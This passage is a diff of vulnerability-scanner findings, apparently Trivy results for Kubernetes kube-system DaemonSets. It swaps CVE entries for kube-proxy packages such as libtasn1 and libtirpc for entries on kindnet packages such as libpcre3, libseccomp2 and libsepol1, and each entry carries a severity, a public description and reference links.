"https://gitlab.com/gnutls/libtasn1/-/commit/44a700d2051a666235748970c2df047ff207aeb5", - "https://gitlab.com/gnutls/libtasn1/-/issues/32", - "https://linux.oracle.com/cve/CVE-2021-46848.html", - "https://linux.oracle.com/errata/ELSA-2023-0343.html", - "https://lists.debian.org/debian-lts-announce/2023/01/msg00003.html", - "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/AV4SHDJF2XLB4CUPTBPQQ6CLGZ5LKXPZ/", - "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/ECM2ELTVRYV4BZ5L5GMIRQE27RFHPAQ6/", - "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/OGO7XST4EIJGX4B2ITZCYSWM24534BSU/", - "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/V5LWOGF7QRMNFRUCZY6TDYQJVFI6MOQ2/", - "https://nvd.nist.gov/vuln/detail/CVE-2021-46848", - "https://security.netapp.com/advisory/ntap-20221118-0006/", - "https://ubuntu.com/security/notices/USN-5707-1", - "https://www.cve.org/CVERecord?id=CVE-2021-46848", + "http://openwall.com/lists/oss-security/2017/07/11/3", + "http://www.openwall.com/lists/oss-security/2023/04/11/1", + "http://www.openwall.com/lists/oss-security/2023/04/12/1", + "http://www.securityfocus.com/bid/99575", + "https://access.redhat.com/security/cve/CVE-2017-11164", + "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-11164", + "https://lists.apache.org/thread.html/rf9fa47ab66495c78bb4120b0754dd9531ca2ff0430f6685ac9b07772@%3Cdev.mina.apache.org%3E", + "https://nvd.nist.gov/vuln/detail/CVE-2017-11164", + "https://www.cve.org/CVERecord?id=CVE-2017-11164", ], }, "category": "Vulnerability", - "description": "GNU Libtasn1 before 4.19.0 has an ETYPE_OK off-by-one array size check that affects asn1_encode_simple_der.", - "location": "scb://trivy/?Namespace=kube-system&Kind=DaemonSet&Name=kube-proxy", + "description": "In PCRE 8.41, the OP_KETRMAX feature in the match function in pcre_exec.c allows stack exhaustion (uncontrolled recursion) when processing a crafted regular expression.", + "location": "scb://trivy/?Namespace=kube-system&Kind=DaemonSet&Name=kindnet", "mitigation": undefined, - "name": "libtasn1: Out-of-bound access in ETYPE_OK", + "name": "pcre: OP_KETRMAX feature in the match function in pcre_exec.c", "references": [ { "type": "URL", - "value": "https://avd.aquasec.com/nvd/cve-2021-46848", + "value": "https://avd.aquasec.com/nvd/cve-2017-11164", }, { "type": "URL", - "value": "https://access.redhat.com/errata/RHSA-2023:0343", + "value": "http://openwall.com/lists/oss-security/2017/07/11/3", }, { "type": "URL", - "value": "https://access.redhat.com/security/cve/CVE-2021-46848", + "value": "http://www.openwall.com/lists/oss-security/2023/04/11/1", }, { "type": "URL", - "value": "https://bugs.gentoo.org/866237", + "value": "http://www.openwall.com/lists/oss-security/2023/04/12/1", }, { "type": "URL", - "value": "https://bugzilla.redhat.com/2140058", + "value": "http://www.securityfocus.com/bid/99575", }, { "type": "URL", - "value": "https://bugzilla.redhat.com/show_bug.cgi?id=2140058", + "value": "https://access.redhat.com/security/cve/CVE-2017-11164", }, { "type": "URL", - "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-46848", + "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-11164", }, { "type": "URL", - "value": "https://errata.almalinux.org/9/ALSA-2023-0343.html", + "value": "https://lists.apache.org/thread.html/rf9fa47ab66495c78bb4120b0754dd9531ca2ff0430f6685ac9b07772@%3Cdev.mina.apache.org%3E", }, { "type": "URL", - "value": "https://errata.rockylinux.org/RLSA-2023:0343", + "value": "https://nvd.nist.gov/vuln/detail/CVE-2017-11164", }, { "type": "URL", - "value": "https://gitlab.com/gnutls/libtasn1/-/commit/44a700d2051a666235748970c2df047ff207aeb5", + "value": "https://www.cve.org/CVERecord?id=CVE-2017-11164", }, + ], + "severity": "LOW", + }, + { + "attributes": { + "fixedVersion": undefined, + "foundIn": "Target: 'docker.io/kindest/kindnetd:v20210326-1e038dc5 (debian 10.7)' / Class: 'os-pkgs' / Type: 'debian'", + "id": "CVE-2017-16231", + "installedVersion": "2:8.39-12", + "packageName": "libpcre3", + "references": [ + "http://packetstormsecurity.com/files/150897/PCRE-8.41-Buffer-Overflow.html", + "http://seclists.org/fulldisclosure/2018/Dec/33", + "http://www.openwall.com/lists/oss-security/2017/11/01/11", + "http://www.openwall.com/lists/oss-security/2017/11/01/3", + "http://www.openwall.com/lists/oss-security/2017/11/01/7", + "http://www.openwall.com/lists/oss-security/2017/11/01/8", + "http://www.securityfocus.com/bid/101688", + "https://access.redhat.com/security/cve/CVE-2017-16231", + "https://bugs.exim.org/show_bug.cgi?id=2047", + "https://nvd.nist.gov/vuln/detail/CVE-2017-16231", + "https://www.cve.org/CVERecord?id=CVE-2017-16231", + ], + }, + "category": "Vulnerability", + "description": "** DISPUTED ** In PCRE 8.41, after compiling, a pcretest load test PoC produces a crash overflow in the function match() in pcre_exec.c because of a self-recursive call. NOTE: third parties dispute the relevance of this report, noting that there are options that can be used to limit the amount of stack that is used.", + "location": "scb://trivy/?Namespace=kube-system&Kind=DaemonSet&Name=kindnet", + "mitigation": undefined, + "name": "pcre: self-recursive call in match() in pcre_exec.c leads to denial of service", + "references": [ { "type": "URL", - "value": "https://gitlab.com/gnutls/libtasn1/-/issues/32", + "value": "https://avd.aquasec.com/nvd/cve-2017-16231", }, { "type": "URL", - "value": "https://linux.oracle.com/cve/CVE-2021-46848.html", + "value": "http://packetstormsecurity.com/files/150897/PCRE-8.41-Buffer-Overflow.html", }, { "type": "URL", - "value": "https://linux.oracle.com/errata/ELSA-2023-0343.html", + "value": "http://seclists.org/fulldisclosure/2018/Dec/33", }, { "type": "URL", - "value": "https://lists.debian.org/debian-lts-announce/2023/01/msg00003.html", + "value": "http://www.openwall.com/lists/oss-security/2017/11/01/11", }, { "type": "URL", - "value": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/AV4SHDJF2XLB4CUPTBPQQ6CLGZ5LKXPZ/", + "value": "http://www.openwall.com/lists/oss-security/2017/11/01/3", }, { "type": "URL", - "value": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/ECM2ELTVRYV4BZ5L5GMIRQE27RFHPAQ6/", + "value": "http://www.openwall.com/lists/oss-security/2017/11/01/7", }, { "type": "URL", - "value": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/OGO7XST4EIJGX4B2ITZCYSWM24534BSU/", + "value": "http://www.openwall.com/lists/oss-security/2017/11/01/8", }, { "type": "URL", - "value": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/V5LWOGF7QRMNFRUCZY6TDYQJVFI6MOQ2/", + "value": "http://www.securityfocus.com/bid/101688", }, { "type": "URL", - "value": "https://nvd.nist.gov/vuln/detail/CVE-2021-46848", + "value": "https://access.redhat.com/security/cve/CVE-2017-16231", }, { "type": "URL", - "value": "https://security.netapp.com/advisory/ntap-20221118-0006/", + "value": "https://bugs.exim.org/show_bug.cgi?id=2047", }, { "type": "URL", - "value": "https://ubuntu.com/security/notices/USN-5707-1", + "value": "https://nvd.nist.gov/vuln/detail/CVE-2017-16231", }, { "type": "URL", - "value": "https://www.cve.org/CVERecord?id=CVE-2021-46848", + "value": "https://www.cve.org/CVERecord?id=CVE-2017-16231", }, ], - "severity": "HIGH", + "severity": "LOW", }, { "attributes": { - "fixedVersion": "1.3.1-1+deb11u1", - "foundIn": "Target: 'k8s.gcr.io/kube-proxy:v1.24.0 (debian 11.3)' / Class: 'os-pkgs' / Type: 'debian'", - "id": "CVE-2021-46828", - "installedVersion": "1.3.1-1", - "packageName": "libtirpc-common", + "fixedVersion": undefined, + "foundIn": "Target: 'docker.io/kindest/kindnetd:v20210326-1e038dc5 (debian 10.7)' / Class: 'os-pkgs' / Type: 'debian'", + "id": "CVE-2017-7245", + "installedVersion": "2:8.39-12", + "packageName": "libpcre3", "references": [ - "http://git.linux-nfs.org/?p=steved/libtirpc.git;a=commit;h=86529758570cef4c73fb9b9c4104fdc510f701ed", - "https://access.redhat.com/errata/RHSA-2022:8400", - "https://access.redhat.com/security/cve/CVE-2021-46828", - "https://bugzilla.redhat.com/2109352", - "https://bugzilla.redhat.com/show_bug.cgi?id=2109352", - "https://bugzilla.redhat.com/show_bug.cgi?id=2118157", - "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-46828", - "https://errata.almalinux.org/9/ALSA-2022-8400.html", - "https://errata.rockylinux.org/RLSA-2022:8400", - "https://linux.oracle.com/cve/CVE-2021-46828.html", - "https://linux.oracle.com/errata/ELSA-2022-8400.html", - "https://lists.debian.org/debian-lts-announce/2022/08/msg00004.html", - "https://nvd.nist.gov/vuln/detail/CVE-2021-46828", - "https://security.gentoo.org/glsa/202210-33", - "https://security.netapp.com/advisory/ntap-20221007-0004/", - "https://ubuntu.com/security/notices/USN-5538-1", - "https://www.cve.org/CVERecord?id=CVE-2021-46828", - "https://www.debian.org/security/2022/dsa-5200", + "http://www.securityfocus.com/bid/97067", + "https://access.redhat.com/errata/RHSA-2018:2486", + "https://access.redhat.com/security/cve/CVE-2017-7245", + "https://blogs.gentoo.org/ago/2017/03/20/libpcre-two-stack-based-buffer-overflow-write-in-pcre32_copy_substring-pcre_get-c/", + "https://nvd.nist.gov/vuln/detail/CVE-2017-7245", + "https://security.gentoo.org/glsa/201710-25", + "https://www.cve.org/CVERecord?id=CVE-2017-7245", ], }, "category": "Vulnerability", - "description": "In libtirpc before 1.3.3rc1, remote attackers could exhaust the file descriptors of a process that uses libtirpc because idle TCP connections are mishandled. This can, in turn, lead to an svc_run infinite loop without accepting new connections.", - "location": "scb://trivy/?Namespace=kube-system&Kind=DaemonSet&Name=kube-proxy", + "description": "Stack-based buffer overflow in the pcre32_copy_substring function in pcre_get.c in libpcre1 in PCRE 8.40 allows remote attackers to cause a denial of service (WRITE of size 4) or possibly have unspecified other impact via a crafted file.", + "location": "scb://trivy/?Namespace=kube-system&Kind=DaemonSet&Name=kindnet", "mitigation": undefined, - "name": "libtirpc: DoS vulnerability with lots of connections", + "name": "pcre: stack-based buffer overflow write in pcre32_copy_substring", "references": [ { "type": "URL", - "value": "https://avd.aquasec.com/nvd/cve-2021-46828", - }, - { - "type": "URL", - "value": "http://git.linux-nfs.org/?p=steved/libtirpc.git;a=commit;h=86529758570cef4c73fb9b9c4104fdc510f701ed", - }, - { - "type": "URL", - "value": "https://access.redhat.com/errata/RHSA-2022:8400", - }, - { - "type": "URL", - "value": "https://access.redhat.com/security/cve/CVE-2021-46828", + "value": "https://avd.aquasec.com/nvd/cve-2017-7245", }, { "type": "URL", - "value": "https://bugzilla.redhat.com/2109352", + "value": "http://www.securityfocus.com/bid/97067", }, { "type": "URL", - "value": "https://bugzilla.redhat.com/show_bug.cgi?id=2109352", + "value": "https://access.redhat.com/errata/RHSA-2018:2486", }, { "type": "URL", - "value": "https://bugzilla.redhat.com/show_bug.cgi?id=2118157", + "value": "https://access.redhat.com/security/cve/CVE-2017-7245", }, { "type": "URL", - "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-46828", + "value": "https://blogs.gentoo.org/ago/2017/03/20/libpcre-two-stack-based-buffer-overflow-write-in-pcre32_copy_substring-pcre_get-c/", }, { "type": "URL", - "value": "https://errata.almalinux.org/9/ALSA-2022-8400.html", + "value": "https://nvd.nist.gov/vuln/detail/CVE-2017-7245", }, { "type": "URL", - "value": "https://errata.rockylinux.org/RLSA-2022:8400", + "value": "https://security.gentoo.org/glsa/201710-25", }, { "type": "URL", - "value": "https://linux.oracle.com/cve/CVE-2021-46828.html", + "value": "https://www.cve.org/CVERecord?id=CVE-2017-7245", }, + ], + "severity": "LOW", + }, + { + "attributes": { + "fixedVersion": undefined, + "foundIn": "Target: 'docker.io/kindest/kindnetd:v20210326-1e038dc5 (debian 10.7)' / Class: 'os-pkgs' / Type: 'debian'", + "id": "CVE-2017-7246", + "installedVersion": "2:8.39-12", + "packageName": "libpcre3", + "references": [ + "http://www.securityfocus.com/bid/97067", + "https://access.redhat.com/errata/RHSA-2018:2486", + "https://access.redhat.com/security/cve/CVE-2017-7246", + "https://blogs.gentoo.org/ago/2017/03/20/libpcre-two-stack-based-buffer-overflow-write-in-pcre32_copy_substring-pcre_get-c/", + "https://nvd.nist.gov/vuln/detail/CVE-2017-7246", + "https://security.gentoo.org/glsa/201710-25", + "https://www.cve.org/CVERecord?id=CVE-2017-7246", + ], + }, + "category": "Vulnerability", + "description": "Stack-based buffer overflow in the pcre32_copy_substring function in pcre_get.c in libpcre1 in PCRE 8.40 allows remote attackers to cause a denial of service (WRITE of size 268) or possibly have unspecified other impact via a crafted file.", + "location": "scb://trivy/?Namespace=kube-system&Kind=DaemonSet&Name=kindnet", + "mitigation": undefined, + "name": "pcre: stack-based buffer overflow write in pcre32_copy_substring", + "references": [ { "type": "URL", - "value": "https://linux.oracle.com/errata/ELSA-2022-8400.html", + "value": "https://avd.aquasec.com/nvd/cve-2017-7246", }, { "type": "URL", - "value": "https://lists.debian.org/debian-lts-announce/2022/08/msg00004.html", + "value": "http://www.securityfocus.com/bid/97067", }, { "type": "URL", - "value": "https://nvd.nist.gov/vuln/detail/CVE-2021-46828", + "value": "https://access.redhat.com/errata/RHSA-2018:2486", }, { "type": "URL", - "value": "https://security.gentoo.org/glsa/202210-33", + "value": "https://access.redhat.com/security/cve/CVE-2017-7246", }, { "type": "URL", - "value": "https://security.netapp.com/advisory/ntap-20221007-0004/", + "value": "https://blogs.gentoo.org/ago/2017/03/20/libpcre-two-stack-based-buffer-overflow-write-in-pcre32_copy_substring-pcre_get-c/", }, { "type": "URL", - "value": "https://ubuntu.com/security/notices/USN-5538-1", + "value": "https://nvd.nist.gov/vuln/detail/CVE-2017-7246", }, { "type": "URL", - "value": "https://www.cve.org/CVERecord?id=CVE-2021-46828", + "value": "https://security.gentoo.org/glsa/201710-25", }, { "type": "URL", - "value": "https://www.debian.org/security/2022/dsa-5200", + "value": "https://www.cve.org/CVERecord?id=CVE-2017-7246", }, ], - "severity": "HIGH", + "severity": "LOW", }, { "attributes": { - "fixedVersion": "1.3.1-1+deb11u1", - "foundIn": "Target: 'k8s.gcr.io/kube-proxy:v1.24.0 (debian 11.3)' / Class: 'os-pkgs' / Type: 'debian'", - "id": "CVE-2021-46828", - "installedVersion": "1.3.1-1", - "packageName": "libtirpc3", + "fixedVersion": undefined, + "foundIn": "Target: 'docker.io/kindest/kindnetd:v20210326-1e038dc5 (debian 10.7)' / Class: 'os-pkgs' / Type: 'debian'", + "id": "CVE-2019-20838", + "installedVersion": "2:8.39-12", + "packageName": "libpcre3", "references": [ - "http://git.linux-nfs.org/?p=steved/libtirpc.git;a=commit;h=86529758570cef4c73fb9b9c4104fdc510f701ed", - "https://access.redhat.com/errata/RHSA-2022:8400", - "https://access.redhat.com/security/cve/CVE-2021-46828", - "https://bugzilla.redhat.com/2109352", - "https://bugzilla.redhat.com/show_bug.cgi?id=2109352", - "https://bugzilla.redhat.com/show_bug.cgi?id=2118157", - "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-46828", - "https://errata.almalinux.org/9/ALSA-2022-8400.html", - "https://errata.rockylinux.org/RLSA-2022:8400", - "https://linux.oracle.com/cve/CVE-2021-46828.html", - "https://linux.oracle.com/errata/ELSA-2022-8400.html", - "https://lists.debian.org/debian-lts-announce/2022/08/msg00004.html", - "https://nvd.nist.gov/vuln/detail/CVE-2021-46828", - "https://security.gentoo.org/glsa/202210-33", - "https://security.netapp.com/advisory/ntap-20221007-0004/", - "https://ubuntu.com/security/notices/USN-5538-1", - "https://www.cve.org/CVERecord?id=CVE-2021-46828", - "https://www.debian.org/security/2022/dsa-5200", + "http://seclists.org/fulldisclosure/2020/Dec/32", + "http://seclists.org/fulldisclosure/2021/Feb/14", + "https://access.redhat.com/security/cve/CVE-2019-20838", + "https://bugs.gentoo.org/717920", + "https://bugzilla.redhat.com/show_bug.cgi?id=1848436", + "https://bugzilla.redhat.com/show_bug.cgi?id=1848444", + "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-20838", + "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-14155", + "https://errata.almalinux.org/8/ALSA-2021-4373.html", + "https://errata.rockylinux.org/RLSA-2021:4373", + "https://linux.oracle.com/cve/CVE-2019-20838.html", + "https://linux.oracle.com/errata/ELSA-2021-4373.html", + "https://lists.apache.org/thread.html/rf9fa47ab66495c78bb4120b0754dd9531ca2ff0430f6685ac9b07772@%3Cdev.mina.apache.org%3E", + "https://nvd.nist.gov/vuln/detail/CVE-2019-20838", + "https://support.apple.com/kb/HT211931", + "https://support.apple.com/kb/HT212147", + "https://ubuntu.com/security/notices/USN-5425-1", + "https://www.cve.org/CVERecord?id=CVE-2019-20838", + "https://www.pcre.org/original/changelog.txt", ], }, "category": "Vulnerability", - "description": "In libtirpc before 1.3.3rc1, remote attackers could exhaust the file descriptors of a process that uses libtirpc because idle TCP connections are mishandled. This can, in turn, lead to an svc_run infinite loop without accepting new connections.", - "location": "scb://trivy/?Namespace=kube-system&Kind=DaemonSet&Name=kube-proxy", + "description": "libpcre in PCRE before 8.43 allows a subject buffer over-read in JIT when UTF is disabled, and \\X or \\R has more than one fixed quantifier, a related issue to CVE-2019-20454.", + "location": "scb://trivy/?Namespace=kube-system&Kind=DaemonSet&Name=kindnet", "mitigation": undefined, - "name": "libtirpc: DoS vulnerability with lots of connections", + "name": "pcre: Buffer over-read in JIT when UTF is disabled and \\X or \\R has fixed quantifier greater than 1", "references": [ { "type": "URL", - "value": "https://avd.aquasec.com/nvd/cve-2021-46828", + "value": "https://avd.aquasec.com/nvd/cve-2019-20838", }, { "type": "URL", - "value": "http://git.linux-nfs.org/?p=steved/libtirpc.git;a=commit;h=86529758570cef4c73fb9b9c4104fdc510f701ed", + "value": "http://seclists.org/fulldisclosure/2020/Dec/32", }, { "type": "URL", - "value": "https://access.redhat.com/errata/RHSA-2022:8400", + "value": "http://seclists.org/fulldisclosure/2021/Feb/14", }, { "type": "URL", - "value": "https://access.redhat.com/security/cve/CVE-2021-46828", + "value": "https://access.redhat.com/security/cve/CVE-2019-20838", }, { "type": "URL", - "value": "https://bugzilla.redhat.com/2109352", + "value": "https://bugs.gentoo.org/717920", }, { "type": "URL", - "value": "https://bugzilla.redhat.com/show_bug.cgi?id=2109352", + "value": "https://bugzilla.redhat.com/show_bug.cgi?id=1848436", }, { "type": "URL", - "value": "https://bugzilla.redhat.com/show_bug.cgi?id=2118157", + "value": "https://bugzilla.redhat.com/show_bug.cgi?id=1848444", }, { "type": "URL", - "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-46828", + "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-20838", }, { "type": "URL", - "value": "https://errata.almalinux.org/9/ALSA-2022-8400.html", + "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-14155", }, { "type": "URL", - "value": "https://errata.rockylinux.org/RLSA-2022:8400", + "value": "https://errata.almalinux.org/8/ALSA-2021-4373.html", }, { "type": "URL", - "value": "https://linux.oracle.com/cve/CVE-2021-46828.html", + "value": "https://errata.rockylinux.org/RLSA-2021:4373", }, { "type": "URL", - "value": "https://linux.oracle.com/errata/ELSA-2022-8400.html", + "value": "https://linux.oracle.com/cve/CVE-2019-20838.html", }, { "type": "URL", - "value": "https://lists.debian.org/debian-lts-announce/2022/08/msg00004.html", + "value": "https://linux.oracle.com/errata/ELSA-2021-4373.html", }, { "type": "URL", - "value": "https://nvd.nist.gov/vuln/detail/CVE-2021-46828", + "value": "https://lists.apache.org/thread.html/rf9fa47ab66495c78bb4120b0754dd9531ca2ff0430f6685ac9b07772@%3Cdev.mina.apache.org%3E", }, { "type": "URL", - "value": "https://security.gentoo.org/glsa/202210-33", + "value": "https://nvd.nist.gov/vuln/detail/CVE-2019-20838", }, { "type": "URL", - "value": "https://security.netapp.com/advisory/ntap-20221007-0004/", + "value": "https://support.apple.com/kb/HT211931", }, { "type": "URL", - "value": "https://ubuntu.com/security/notices/USN-5538-1", + "value": "https://support.apple.com/kb/HT212147", }, { "type": "URL", - "value": "https://www.cve.org/CVERecord?id=CVE-2021-46828", + "value": "https://ubuntu.com/security/notices/USN-5425-1", }, { "type": "URL", - "value": "https://www.debian.org/security/2022/dsa-5200", + "value": "https://www.cve.org/CVERecord?id=CVE-2019-20838", + }, + { + "type": "URL", + "value": "https://www.pcre.org/original/changelog.txt", }, ], - "severity": "HIGH", + "severity": "LOW", }, { "attributes": { - "fixedVersion": "247.3-7+deb11u2", - "foundIn": "Target: 'k8s.gcr.io/kube-proxy:v1.24.0 (debian 11.3)' / Class: 'os-pkgs' / Type: 'debian'", - "id": "CVE-2022-3821", - "installedVersion": "247.3-7", - "packageName": "libudev1", + "fixedVersion": undefined, + "foundIn": "Target: 'docker.io/kindest/kindnetd:v20210326-1e038dc5 (debian 10.7)' / Class: 'os-pkgs' / Type: 'debian'", + "id": "CVE-2019-9893", + "installedVersion": "2.3.3-4", + "packageName": "libseccomp2", "references": [ - "https://access.redhat.com/errata/RHSA-2023:0336", - "https://access.redhat.com/security/cve/CVE-2022-3821", - "https://bugzilla.redhat.com/2139327", - "https://bugzilla.redhat.com/show_bug.cgi?id=2139327", - "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-3821", - "https://errata.almalinux.org/9/ALSA-2023-0336.html", - "https://errata.rockylinux.org/RLSA-2023:0336", - "https://github.com/systemd/systemd/commit/9102c625a673a3246d7e73d8737f3494446bad4e", - "https://github.com/systemd/systemd/issues/23928", - "https://github.com/systemd/systemd/pull/23933", - "https://linux.oracle.com/cve/CVE-2022-3821.html", - "https://linux.oracle.com/errata/ELSA-2023-0336.html", - "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/RVBQC2VLSDVQAPJTEMTREXDL4HYLXG2P/", - "https://nvd.nist.gov/vuln/detail/CVE-2022-3821", - "https://security.gentoo.org/glsa/202305-15", - "https://ubuntu.com/security/notices/USN-5928-1", - "https://www.cve.org/CVERecord?id=CVE-2022-3821", + "http://lists.opensuse.org/opensuse-security-announce/2019-10/msg00022.html", + "http://lists.opensuse.org/opensuse-security-announce/2019-10/msg00027.html", + "http://www.paul-moore.com/blog/d/2019/03/libseccomp_v240.html", + "https://access.redhat.com/errata/RHSA-2019:3624", + "https://access.redhat.com/security/cve/CVE-2019-9893", + "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-9893", + "https://github.com/seccomp/libseccomp/issues/139", + "https://linux.oracle.com/cve/CVE-2019-9893.html", + "https://linux.oracle.com/errata/ELSA-2019-3624.html", + "https://nvd.nist.gov/vuln/detail/CVE-2019-9893", + "https://seclists.org/oss-sec/2019/q1/179", + "https://security.gentoo.org/glsa/201904-18", + "https://ubuntu.com/security/notices/USN-4001-1", + "https://ubuntu.com/security/notices/USN-4001-2", + "https://usn.ubuntu.com/4001-1/", + "https://usn.ubuntu.com/4001-2/", + "https://www.cve.org/CVERecord?id=CVE-2019-9893", + "https://www.openwall.com/lists/oss-security/2019/03/15/1", ], }, "category": "Vulnerability", - "description": "An off-by-one Error issue was discovered in Systemd in format_timespan() function of time-util.c. An attacker could supply specific values for time and accuracy that leads to buffer overrun in format_timespan(), leading to a Denial of Service.", - "location": "scb://trivy/?Namespace=kube-system&Kind=DaemonSet&Name=kube-proxy", + "description": "libseccomp before 2.4.0 did not correctly generate 64-bit syscall argument comparisons using the arithmetic operators (LT, GT, LE, GE), which might able to lead to bypassing seccomp filters and potential privilege escalations.", + "location": "scb://trivy/?Namespace=kube-system&Kind=DaemonSet&Name=kindnet", "mitigation": undefined, - "name": "buffer overrun in format_timespan() function", + "name": "libseccomp: incorrect generation of syscall filters in libseccomp", "references": [ { "type": "URL", - "value": "https://avd.aquasec.com/nvd/cve-2022-3821", + "value": "https://avd.aquasec.com/nvd/cve-2019-9893", }, { "type": "URL", - "value": "https://access.redhat.com/errata/RHSA-2023:0336", + "value": "http://lists.opensuse.org/opensuse-security-announce/2019-10/msg00022.html", }, { "type": "URL", - "value": "https://access.redhat.com/security/cve/CVE-2022-3821", + "value": "http://lists.opensuse.org/opensuse-security-announce/2019-10/msg00027.html", }, { "type": "URL", - "value": "https://bugzilla.redhat.com/2139327", + "value": "http://www.paul-moore.com/blog/d/2019/03/libseccomp_v240.html", }, { "type": "URL", - "value": "https://bugzilla.redhat.com/show_bug.cgi?id=2139327", + "value": "https://access.redhat.com/errata/RHSA-2019:3624", }, { "type": "URL", - "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-3821", + "value": "https://access.redhat.com/security/cve/CVE-2019-9893", }, { "type": "URL", - "value": "https://errata.almalinux.org/9/ALSA-2023-0336.html", + "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-9893", }, { "type": "URL", - "value": "https://errata.rockylinux.org/RLSA-2023:0336", + "value": "https://github.com/seccomp/libseccomp/issues/139", }, { "type": "URL", - "value": "https://github.com/systemd/systemd/commit/9102c625a673a3246d7e73d8737f3494446bad4e", + "value": "https://linux.oracle.com/cve/CVE-2019-9893.html", }, { "type": "URL", - "value": "https://github.com/systemd/systemd/issues/23928", + "value": "https://linux.oracle.com/errata/ELSA-2019-3624.html", }, { "type": "URL", - "value": "https://github.com/systemd/systemd/pull/23933", + "value": "https://nvd.nist.gov/vuln/detail/CVE-2019-9893", }, { "type": "URL", - "value": "https://linux.oracle.com/cve/CVE-2022-3821.html", + "value": "https://seclists.org/oss-sec/2019/q1/179", }, { "type": "URL", - "value": "https://linux.oracle.com/errata/ELSA-2023-0336.html", + "value": "https://security.gentoo.org/glsa/201904-18", }, { "type": "URL", - "value": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/RVBQC2VLSDVQAPJTEMTREXDL4HYLXG2P/", + "value": "https://ubuntu.com/security/notices/USN-4001-1", }, { "type": "URL", - "value": "https://nvd.nist.gov/vuln/detail/CVE-2022-3821", + "value": "https://ubuntu.com/security/notices/USN-4001-2", }, { "type": "URL", - "value": "https://security.gentoo.org/glsa/202305-15", + "value": "https://usn.ubuntu.com/4001-1/", }, { "type": "URL", - "value": "https://ubuntu.com/security/notices/USN-5928-1", + "value": "https://usn.ubuntu.com/4001-2/", }, { "type": "URL", - "value": "https://www.cve.org/CVERecord?id=CVE-2022-3821", + "value": "https://www.cve.org/CVERecord?id=CVE-2019-9893", + }, + { + "type": "URL", + "value": "https://www.openwall.com/lists/oss-security/2019/03/15/1", }, ], - "severity": "MEDIUM", + "severity": "LOW", }, { "attributes": { - "fixedVersion": "247.3-7+deb11u2", - "foundIn": "Target: 'k8s.gcr.io/kube-proxy:v1.24.0 (debian 11.3)' / Class: 'os-pkgs' / Type: 'debian'", - "id": "CVE-2022-4415", - "installedVersion": "247.3-7", - "packageName": "libudev1", + "fixedVersion": undefined, + "foundIn": "Target: 'docker.io/kindest/kindnetd:v20210326-1e038dc5 (debian 10.7)' / Class: 'os-pkgs' / Type: 'debian'", + "id": "CVE-2021-36084", + "installedVersion": "2.8-1", + "packageName": "libsepol1", "references": [ - "https://access.redhat.com/errata/RHSA-2023:0954", - "https://access.redhat.com/security/cve/CVE-2022-4415", - "https://bugzilla.redhat.com/2149063", - "https://bugzilla.redhat.com/2155515", - "https://bugzilla.redhat.com/show_bug.cgi?id=2149063", - "https://bugzilla.redhat.com/show_bug.cgi?id=2155515", - "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-4415", - "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-45873", - "https://errata.almalinux.org/9/ALSA-2023-0954.html", - "https://errata.rockylinux.org/RLSA-2023:0954", - "https://github.com/systemd/systemd/commit/b7641425659243c09473cd8fb3aef2c0d4a3eb9c", - "https://linux.oracle.com/cve/CVE-2022-4415.html", - "https://linux.oracle.com/errata/ELSA-2023-0954.html", - "https://nvd.nist.gov/vuln/detail/CVE-2022-4415", - "https://ubuntu.com/security/notices/USN-5928-1", - "https://www.cve.org/CVERecord?id=CVE-2022-4415", - "https://www.openwall.com/lists/oss-security/2022/12/21/3", + "https://access.redhat.com/security/cve/CVE-2021-36084", + "https://bugs.chromium.org/p/oss-fuzz/issues/detail?id=31065", + "https://bugzilla.redhat.com/show_bug.cgi?id=1979662", + "https://bugzilla.redhat.com/show_bug.cgi?id=1979664", + "https://bugzilla.redhat.com/show_bug.cgi?id=1979666", + "https://bugzilla.redhat.com/show_bug.cgi?id=1979668", + "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-36084", + "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-36085", + "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-36086", + "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-36087", + "https://errata.almalinux.org/8/ALSA-2021-4513.html", + "https://errata.rockylinux.org/RLSA-2021:4513", + "https://github.com/SELinuxProject/selinux/commit/f34d3d30c8325e4847a6b696fe7a3936a8a361f3", + "https://github.com/google/oss-fuzz-vulns/blob/main/vulns/selinux/OSV-2021-417.yaml", + "https://linux.oracle.com/cve/CVE-2021-36084.html", + "https://linux.oracle.com/errata/ELSA-2021-4513.html", + "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/U7ZYR3PIJ75N6U2IONJWCKZ5L2NKJTGR/", + "https://nvd.nist.gov/vuln/detail/CVE-2021-36084", + "https://ubuntu.com/security/notices/USN-5391-1", + 